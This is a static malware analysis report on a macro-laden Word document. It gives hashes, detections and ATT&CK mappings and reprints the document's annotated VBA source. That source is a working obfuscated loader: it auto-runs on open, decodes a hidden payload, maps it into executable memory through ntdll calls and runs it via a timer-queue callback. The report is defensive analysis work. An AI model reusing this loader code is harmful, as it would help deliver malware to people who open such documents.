Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ee1dcc6cc7591d71…

MALICIOUS

Office (OLE)

208.0 KB Created: 2017-10-05 14:11:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: 0018ec99389ec2ee76a9e99c92f32ebf SHA-1: 68434ae97133e7d2279d679964f8fb0d91ad74f9 SHA-256: ee1dcc6cc7591d7181492bc97382c6db047402dd53bd4ce015d63fc5d701a750
110 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros with a Document_Open auto-run handler and a lure instructing the user to enable macros; together these indicate an intent to execute code as soon as the document is opened. ClamAV flags the file as 'Doc.Dropper.Agent-6339813-0'. The extracted macro source (below) shows an in-memory loader rather than a classic file dropper: on open it reads a 7,844-character encoded string from a control on UserForm 'muse', decodes it with a per-position shift followed by base64 (module 'coodule'), allocates an RWX region in its own process with ntdll!NtAllocateVirtualMemory, copies the 5,883 decoded bytes in with ntdll!NtWriteVirtualMemory, and starts execution through a Kernel32!CreateTimerQueueTimer callback pointing into that region (entry offset 2064 on 64-bit Office, 4240 on 32-bit). The macro itself writes no file to disk; what the payload does next is not visible from static analysis, and this behavior additionally maps to T1620 (Reflective Code Loading) and T1027 (Obfuscated Files or Information). No specific malware family could be confidently identified.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6339813-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6339813-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim abnegation As Variant
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All eight URLs below are XML namespace identifiers (Adobe XMP/Photoshop, W3C RDF, Dublin Core, Office DrawingML) of the kind routinely embedded in image and document metadata; none of them is referenced by the extracted macro code, and they should not be treated as indicators of compromise.
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12283 bytes
SHA-256: 0ae5a4b154c1a477610aa44cbb1f969064d9ebee579f91e21f03df8bfde60a25
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function crumply(costar)
' Loader stage 2: maps the decoded payload into executable memory.
' costar: the String returned by coodule.necessita (raw payload bytes).
' Returns: base address of a new RWX region in the current process that now
'          holds 5883 bytes of the payload (cartwheel adds the entry offset).
' All "N - M + K" arithmetic on literals is obfuscation; evaluated values are noted inline.
Dim laceration As String
Dim zipper As Integer
Dim hieratic As Long
Dim counterespionage As Integer
' (6*3+5) > (7-2*1) is 23 > 5, always true; (48-6*8)*2 is 0, so this reduces to 0 < Win64: 64-bit Office.
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim bayou As String
Dim biolets As LongPtr
scintillating = 59 - 25 - 26 ' = 8, pointer size on 64-bit
Dim handicraftsman As LongPtr
Dim playtime As Integer
Dim probably As Integer
Dim mitigate As LongPtr
Dim autotypic As Integer
#End If
' Same test negated: 32-bit Office.
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim biolets As Long
scintillating = 47 - 5 - 38 ' = 4, pointer size on 32-bit
Dim handicraftsman As Long
Dim mitigate As Long
#End If
' Read a raw pointer out of the Variant that holds costar. VarPtr(costar) + 8 is
' the data slot of the 16-byte Variant descriptor -- presumably the BSTR pointer
' to costar's bytes (confirm against the Variant layout). embowel is an
' NtWriteVirtualMemory-based copy, so this writes one pointer (8 or 4 bytes)
' into the local variable biolets.
bergen = VarPtr(biolets)
amorously = embowel(bergen, VarPtr(costar) + 8, scintillating)
sonorousness = 19 - 34 + 14 ' = -1, the current-process pseudo-handle
handicraftsman = 92 - 2 - 90 ' = 0, BaseAddress (in/out; NULL lets the kernel choose)
anomalops = 52 - 13 - 39 ' = 0, ZeroBits
mitigate = 16 - 72 + 10042 ' = 9986, RegionSize (in/out)
aidance = 115 - 85 + 4066 ' = 4096 = &H1000, MEM_COMMIT
avidity = 99 - 96 + 61 ' = 64 = &H40, PAGE_EXECUTE_READWRITE
' cyclopia is declared in module anesthetic as ntdll!NtAllocateVirtualMemory.
' On success handicraftsman receives the base of the new RWX region.
myrrh = cyclopia(ByVal sonorousness, _
handicraftsman, ByVal anomalops, mitigate, ByVal aidance, _
ByVal avidity)
' Filler: kook is never assigned, so this is Empty * 1 = 0, then overwritten below.
abiotrophy = kook * 1

abiotrophy = Fix(469)

' Copy 5883 payload bytes (= 7844 base64 characters / 4 * 3, the length that
' cartwheel decodes) from costar's bytes into the RWX region.
embowel handicraftsman, biolets, 53 - 55 + 5885
' Filler: Pmt is VBA's loan-payment function; called as a statement, its result is discarded.
generality = 63
bronchitis = 24869
smolderingly = 178415
 Pmt 0, generality, 20274, 59399, 3

crumply = handicraftsman
End Function
Function cartwheel()
' Loader stage 1, called from Document_Open: pulls the encoded payload out of a
' form control, decodes it, maps it into RWX memory (crumply) and schedules it
' for execution through a timer-queue callback.
' No parameters; the return value is never assigned (Empty).
Dim chihuahua As String
Dim attemper As Integer
' Day(#12/5/2013#) = 5: selects an entry on control "station" of UserForm "muse".
' NOTE(review): an integer Value plus SelectedItem.Name is consistent with an
' MSForms TabStrip (Value = selected index, SelectedItem = a Tab with a Name
' property) -- confirm against the form's designer storage, which this extract
' does not include.
muse.station.Value = Day(#12/5/2013#)
' Filler: coaster is unassigned, so varday = (Empty = "lamarckism") = False.
varday = coaster = "lamarckism"
coolie = "prince"
avariciously = gasherbrum
ciel = "cannons"
outspoken = "modesty"

manageability = substructure
artwork = "alcohol"
' The selected item's Name property carries the encoded payload.
Set iodinating = muse.station.SelectedItem
feaze = 46
octameter = 31484
coffer = 138604
 Pmt 0, feaze, 36468, 15117, 4

concept = iodinating.Name
mantilla = 70 - 33 + 7807 ' = 7844
' Keep the last 7844 characters (a multiple of 4 -> 5883 decoded bytes).
hemorrhage = Right(concept, mantilla)
' Custom base64 decode (module coodule); returns the payload bytes as a String.
depiction = coodule.necessita(hemorrhage)
ledge = 11
induration = 13165
peirce = 117822
 Pmt 0, ledge, 28213, 44769, 5

hugueninia = "oilbird"
' 64-bit Office: (8*2+5) > (7-2*1) is always true, (21-7*3)*2 is 0, so this is 0 < Win64.
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim iconography As Variant
Dim doomed As LongPtr
Dim muggee As LongPtr
Dim lorcha As Integer

Dim niblick As Integer
Dim broncho As LongPtr
Dim handwheel As LongPtr
Dim hiss As LongPtr
laocoon = 11 - 58 + 2111 ' = 2064, entry-point offset into the payload on 64-bit
#End If
' 32-bit Office.
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim sporangium As Integer
Dim muggee As Long
Dim guttaserena As String
Dim doomed As Long

Dim broncho As Long
dogfish = 23 - 116 + 874 ' = 781
Dim handwheel As Long
Dim hiss As Long
laocoon = dogfish + 3459 ' = 4240, entry-point offset into the payload on 32-bit
#End If
perfusion = 10 - 126 + 116
shipside = "pakistani"
woven = "unbought"
flipflop = 38 - 10 + 4068
erinaceus = 66
unbound = 8241
arborical = 567881
 Pmt 0, erinaceus, 27575, 12079, 5

capability = oneway
condensed = "dysmenorrhea"
discourage = "prospectively"
tall = 116
claustrophobia = 4014
johnsonian = 166406
 Pmt 0, tall, 5232, 35807, 3

polysaccharide = depiction
remarkably = "guttering"
fatally = "crosslinguistic"
' Base address of the RWX copy of the payload.
doomed = crumply(polysaccharide)
underthecounter = "nefariously"
Dim rebel As Byte
Dim shawl As Long
broncho = 127 - 52 - 75 ' = 0
muggee = doomed + laocoon ' callback address = payload base + entry offset
handwheel = 48 - 114 + 201593 ' = 201527; passed ByRef as the phNewTimer out-parameter, so the initial value is irrelevant
hiss = 3 - 42 + 3539 ' = 3500, unused
' idotism is declared in module anesthetic as Kernel32!CreateTimerQueueTimer:
' (phNewTimer=&handwheel, TimerQueue=NULL, Callback=muggee, Parameter=0,
'  DueTime=0, Period=0, Flags=0). DueTime 0 requests an immediate callback on a
' thread-pool thread, i.e. the payload runs without CreateThread/CreateProcess
' and no new process is spawned by the macro.
demodulation = idotism(handwheel, broncho, muggee, broncho, broncho, broncho, broncho)
amice = 26
chambers = 7519
chawbacon = 143884
 Pmt 0, amice, 34526, 50244, 6

End Function
Private Sub Document_Open()
' Auto-run entry point: Word executes this when the document is opened with
' macros enabled (hence the enable-macros lure). The only real work is the
' call to cartwheel; every other statement is filler.
Dim abnegation As Variant
Dim prelude As Variant
hobbyhorse = "bleeding"
dismiss = "irradiation"
cartwheel
wifely = 10 + 4
mohammedian = 29310 + 3
centerfire = 116460 + 4
 Pmt 0, wifely, 39054, 21416, 5
End Sub

Attribute VB_Name = "anesthetic"
' API import table for the loader. The original source interleaves song-lyric
' comment lines between the declarations as filler; they carried no code and are
' replaced by these notes. Obfuscated aliases -> real exports:
'   bon      -> ntdll!NtWriteVirtualMemory     (used by Module1.embowel)
'   cyclopia -> ntdll!NtAllocateVirtualMemory  (used by ThisDocument.crumply)
'   idotism  -> Kernel32!CreateTimerQueueTimer (used by ThisDocument.cartwheel)
'   kowtow, offered, absolver -> never referenced in the extracted source (decoys).
' The decoys also name libraries that do not appear to export those functions
' (e.g. SleepConditionVariableSRW / GetOverlappedResult via Shlwapi.dll), so
' they would presumably fail to bind even if called. Note the trailing spaces
' inside several Lib strings and the "abdomenByVal"/"intermittenceByVal"
' parameter names: a lost ByVal keyword leaves RegionSize ByRef, which is what
' NtAllocateVirtualMemory expects.
' ((18*3)-(20/5)) > (24/6) is 50 > 4, always true, so each condition reduces to Win64 > 0.
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
' 64-bit Office: PtrSafe declarations.
Public Declare PtrSafe Function kowtow Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal numerable As Any, aerostatics As Any, arcadic As Any, taoist As Any) As LongPtr
Public Declare PtrSafe Function offered Lib "ntdll.dll  " Alias _
  "AcquireSRWLockShared" (agains As Any) As LongPtr
' NtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten)
Public Declare PtrSafe Function bon Lib "ntdll.dll  " Alias _
  "NtWriteVirtualMemory" (ByVal charlatanism As Any, ByVal ceremonie As Any, ByVal intracranial As Any, ByVal combinable As Any, ByVal eatage As Any) As LongPtr
' CreateTimerQueueTimer(phNewTimer, TimerQueue, Callback, Parameter, DueTime, Period, Flags)
Public Declare PtrSafe Function idotism Lib "Kernel32" Alias _
  "CreateTimerQueueTimer" (aruspex As Any, ByVal conchfish As Any, ByVal adjuration As Any, ByVal quadrifoliolate As Any, ByVal dilettantism As Any, ByVal acinonyx As Any, ByVal bucktooth As Any) As Long
' NtAllocateVirtualMemory(ProcessHandle, *BaseAddress, ZeroBits, *RegionSize, AllocationType, Protect)
Public Declare PtrSafe Function cyclopia Lib "ntdll.dll  " Alias _
  "NtAllocateVirtualMemory" (nosegay As LongPtr, cenotaph As LongPtr, ByVal astrodynamics As LongPtr, abdomenByVal As LongPtr, detachment As LongPtr, ByVal bewitchery As LongPtr) As LongPtr
#End If
' 32-bit Office: the same imports without PtrSafe/LongPtr; kowtow/offered are
' replaced by the equally unused absolver.
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Public Declare Function idotism Lib "Kernel32" Alias _
   "CreateTimerQueueTimer" (conceivable As Any, ByVal azathioprine As Any, ByVal internally As Any, ByVal jube As Any, ByVal aback As Any, ByVal chunnel As Any, ByVal pursuit As Any) As Long
Public Declare Function absolver Lib "Shlwapi.dll  " Alias _
  "GetOverlappedResult" (ByVal arabia As Any, kalahari As Any, hosanna As Any, fruitarian As Any) As Long
Public Declare Function cyclopia Lib "Ntdll.dll " Alias _
  "NtAllocateVirtualMemory" (baboon As Long, degrade As Long, ByVal anastatica As Long, intermittenceByVal As Long, smothered As Long, ByVal cebidae As Long) As Long
Public Declare Function bon Lib "Ntdll.dll   " Alias _
"NtWriteVirtualMemory" (ByVal slippery As Any, ByVal extinguuntur As Any, ByVal momordica As Any, ByVal ticktacktoe As Any, ByVal ingenuousness As Any) As Long
#End If


Attribute VB_Name = "muse"
' UserForm module "muse" (the VB_Base GUID pair identifies the form's class and
' designer storage). It contains no code. Its control "station", read by
' ThisDocument.cartwheel (muse.station.Value / .SelectedItem.Name), is defined
' in the form's frm/frx storage, which this extract does not carve -- the
' encoded payload is presumably stored as a property of that control, so the
' form streams are the next thing to pull from the sample.
Attribute VB_Base = "0{0DDCC70F-9313-4CB2-9902-4930CEABED4F}{565D2A9F-95E7-4FB3-A81E-7D188D04AC7F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "coodule"
Function necessita(filibusterism) As String
' Payload decoder: a per-position de-shift followed by plain base64 decoding.
' filibusterism: the 7844-character string cartwheel extracts (Right(name, 7844)).
' Returns: a String built from the 6963-byte output buffer; assigning a Byte
'          array to a String in VBA copies the bytes without charset conversion,
'          so the first 5883 bytes are the decoded payload (crumply copies exactly that many).
' NOTE(review): both loops index 0..7843 unconditionally -- the length is
' hard-wired, and a shorter input raises "Subscript out of range".
' Literal arithmetic is obfuscation; evaluated values are noted inline.
Dim amhara As Long
Dim despotic As Long

Dim chylific(63) As Long
chihuahua = Rnd(236)

Dim kanzu As String
Dim rumbling() As Byte
chaplaincy = "cotenancy"

Dim nectarine(63) As Long
Dim halide As Integer
Dim fraudulent As Long
chaplaincy = balaeniceps

Dim collector As Byte

Dim attributed As Integer

Dim acting As Long
Dim doubledistilled As Long

Dim teneatis As Long
' Output buffer: 6963 bytes, of which 5883 are written.
Dim laminaria(6962) As Byte
Dim crinkly(63) As Long
champain = 74 - 63 + 262133 ' = 262144 = 2^18
lofoten = 14 - 91 + 141 ' = 64 = 2^6
arilus = 100 - 118 + 274 ' = 256 = 2^8
pennatula = 111 - 21 + 16514982 ' unused
unction = 26 - 6 + 16711660 ' = 16711680 = &HFF0000
harmonically = 2 - 123 + 65401 ' = 65280 = &HFF00
indeterminate = 7 - 127 + 4216 ' = 4096 = 2^12
Dim visage As Variant

solace = 32 - 107 + 4107 ' unused
per = 66 - 53 + 258035 ' unused
Dim gaiete As Byte

Dim blotches As String

detracting = 94 - 57 + 218 ' = 255 = &HFF
ruritanian = 93 - 114 + 84 ' unused
bawdyhouse = 113 - 42 + 65465 ' = 65536 = 2^16
Dim highhandedly As Integer
trapdoor = 109 - 27 - 82 ' unused
bendable = 10 - 119 + 7952 ' unused
Dim dues() As Byte
Dim coexist As String
Dim irascible As Long
' 128 = vbFromUnicode: one byte per character.
dues = VBA.StrConv(filibusterism, 128)
Dim bowman As Long
dol = 55
balaenidae = 39679
harpooner = 478586
 Pmt 0, dol, 39423, 21006, 7

canteen = 7843
poorwill = vbKeyShift - 12 ' vbKeyShift = 16, so poorwill = 4
' Step 1 -- undo the transport shift: even positions were stored +4, odd positions +3.
For launderette = 0 To canteen
If launderette Mod 2 = 0 Then
dues(launderette) = dues(launderette) - poorwill
Else
dues(launderette) = dues(launderette) - (poorwill - 1)
End If
Next launderette
ostrogoth = 120
prejudice = 38736
everlastingness = 147988
 Pmt 0, ostrogoth, 21597, 33218, 6

halide = 0
bunkum = 20 - 92 + 72
maliciously = 100 - 5 - 52
' Standard base64 alphabet -> 6-bit value lookup table (see benzodiazepine).
buttress = benzodiazepine
' geococcyx(a, b, 59) is a * b: build shift tables i<<6, i<<12, i<<18 for i = 0..63.
For acting = (7 - 7) * 1 To (50 + 13) * (5 - 4)
nectarine(acting) = geococcyx(acting, lofoten, 59)
crinkly(acting) = geococcyx(acting, indeterminate, 59)
chylific(acting) = geococcyx(acting, champain, 59)
Next acting
kohl = 10
preparatory = 38832
bloodsport = 594843
 Pmt 0, kohl, 7611, 38980, 4

rumbling = dues
fond = 9 - 103 + 98
bongo = 17
dray = 7386
packaged = 354105
 Pmt 0, bongo, 8700, 43194, 7

vicuna = 12 - 107 + 98 ' = 3
balaeniceps = "steroid"

balaeniceps = "scud"

oldfashioned = vicuna + 1
bath = 73 - 2 - 69 ' = 2
' Step 2 -- base64: four input characters -> one 24-bit group -> three output bytes.
' amhara advances by 3 inside the body plus 1 at Next, i.e. 4 per iteration.
' geococcyx(x, m, 51) is x And m; geococcyx(x, d, 41) is x \ d.
For amhara = 0 To canteen
catmint = rumbling(amhara)
bubulcus = rumbling(amhara + 2)
prophylaxis = crinkly(buttress(rumbling(amhara + 1))) ' c1 << 12
hierarch = nectarine(buttress(bubulcus)) + buttress(rumbling(amhara + vicuna)) ' (c2 << 6) + c3
teneatis = chylific(buttress(catmint)) + prophylaxis + hierarch ' (c0 << 18) + ...
acting = geococcyx(teneatis, unction, 51)
laminaria(fraudulent) = geococcyx(acting, bawdyhouse, 41) ' (group And &HFF0000) \ 2^16
acting = geococcyx(teneatis, harmonically, 51)
laminaria(fraudulent + 1) = geococcyx(acting, arilus, 41) ' (group And &HFF00) \ 2^8
laminaria(fraudulent + bath) = geococcyx(teneatis, detracting, 51) ' group And &HFF
fraudulent = fraudulent + bath + 1
amhara = amhara + 3
Next
necessita = laminaria
End Function

Function benzodiazepine()
' Builds the base64 reverse alphabet: fleissig(c) = 6-bit value of character code c.
' Returns the 256-entry Byte array; indices not set below stay 0.
' Each Do While loop runs one position past the range it maps, so three extra
' entries exist ('[' -> 26, ':' -> 62, '{' -> 52). They are only reached if such
' a character appears in the input, which valid base64 never contains.
Dim fleissig(255) As Byte
depicting = 28 - 49 + 86 ' = 65, 'A'
Do While depicting <= 90 + 1
fleissig(depicting) = depicting - 65 ' 'A'..'Z' -> 0..25
depicting = depicting + 1
Loop
depicting = 48 ' '0'
Do While depicting <= 50 + 8
fleissig(depicting) = depicting + 4 ' '0'..'9' -> 52..61
depicting = depicting + 1
Loop
depicting = 97 ' 'a'
Do While depicting <= 120 + 3
fleissig(depicting) = depicting - 71 ' 'a'..'z' -> 26..51
depicting = depicting + 1
Loop
fleissig(47) = 63 ' '/' -> 63
depicting = 43
fleissig(depicting) = 60 + 2 ' '+' -> 62
benzodiazepine = fleissig
End Function
Function disposition(icefloe)
' Returns the UTF-16 code of the first character of icefloe (a thin AscW wrapper).
' Not referenced by any other routine in the extracted source -- dead code / filler.
Dim firstCode As Integer
firstCode = AscW(icefloe)
disposition = firstCode
End Function
Function geococcyx(cyclopean, apteral, moonglade)
' Three-way arithmetic dispatcher used by the payload decoder (necessita).
' moonglade selects the operation; the original spells the selectors as
' obfuscated expressions that evaluate to 41, 51 and 59:
'   41 -> integer division  cyclopean \ apteral
'   51 -> bitwise And       cyclopean And apteral
'   59 -> multiplication    cyclopean * apteral
' Any other selector leaves the result unassigned (Empty).
Select Case moonglade
Case 41
geococcyx = cyclopean \ apteral
Case 51
geococcyx = cyclopean And apteral
Case 59
geococcyx = cyclopean * apteral
End Select
End Function

Attribute VB_Name = "Module1"

Function embowel(hookah, fairymythology, synercus)
' Process-local memory copy routed through ntdll!NtWriteVirtualMemory (bon),
' presumably to avoid the commonly flagged RtlMoveMemory/CopyMemory imports.
' hookah:         destination address
' fairymythology: source address
' synercus:       number of bytes to copy
' The return value is never assigned (Empty); both callers ignore it.
' ((18*3)-(20/5)) > (24/6) is 50 > 4, so the conditions reduce to Win64 > 0 / Not.
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim ardor As Integer
Dim anserine As Byte
Dim aguets As LongPtr
Dim annexe As LongPtr
Dim ages As LongPtr
Dim mint As Variant
Dim arius As LongPtr
Dim heterometabolous As LongPtr
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim annexe As Long
Dim baptismal As Variant
Dim aguets As Long
Dim stumblingstone As Variant
Dim arius As Long
Dim pyrotechnics As Long
Dim ages As Long
Dim snappish As String
Dim heterometabolous As Long
Dim highpitched As Variant
Dim defamation As String
#End If
' Filler: chaplaincy and balaeniceps are never assigned anything meaningful; Rnd results are discarded.
millivoltmeter = chaplaincy
chihuahua = Rnd(461)
annexe = hookah ' destination
heterometabolous = synercus ' byte count
chaplaincy = balaeniceps
arius = fairymythology ' source
guenon = 20 + 3
hardbake = 29280 + 0
microsecond = 297550 + 5
 Pmt 0, guenon, 13596, 10065, 4

chihuahua = chihuahua Or 245
aguets = 81 - 1 - 81 ' = -1: the current-process pseudo-handle
' NtWriteVirtualMemory(ProcessHandle=-1, BaseAddress=dest, Buffer=src,
'   NumberOfBytesToWrite=size, NumberOfBytesWritten=ages). ages is passed by
' value and still 0, so the last argument is NULL (the optional out-pointer).
bon ByVal aguets, annexe, arius, heterometabolous, ages
chihuahua = chihuahua - 158
End Function

Attribute VB_Name = "Module2"